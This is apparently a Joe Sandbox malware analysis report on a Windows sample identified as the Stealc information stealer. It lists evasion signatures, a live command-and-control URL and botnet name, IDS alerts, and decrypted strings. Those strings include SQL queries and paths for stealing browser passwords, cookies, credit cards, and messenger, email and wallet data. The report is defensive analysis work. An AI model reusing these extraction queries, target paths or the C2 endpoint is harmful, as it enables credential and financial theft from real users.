Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546617
MD5:caff2fe6c91944cca73634bb9b591335
SHA1:f449657c2b9733b3cd2b90b7320097902f9a94c9
SHA256:68765aa962ddcffd239f27e69605d71138b54d35ed5fd9f36b7e33b0b672ab34
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CAFF2FE6C91944CCA73634BB9B591335)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1239089821.0000000004E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5960JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5960JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.a30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:52:19.231782+010020229301A Network Trojan was detected20.109.210.53443192.168.2.749720TCP
                2024-11-01T08:52:57.975035+010020229301A Network Trojan was detected20.109.210.53443192.168.2.749944TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:52:05.984629+010020442431Malware Command and Control Activity Detected192.168.2.749699185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.a30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: history
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: History
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: open
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: files
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 00000001
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 00000002
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 00000003
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: 00000004
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \Outlook\accounts.txt
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: Pidgin
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: \.purple\
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: accounts.xml
                Source: 0.2.file.exe.a30000.0.unpackString decryptor: dQw4w9WgXcQ
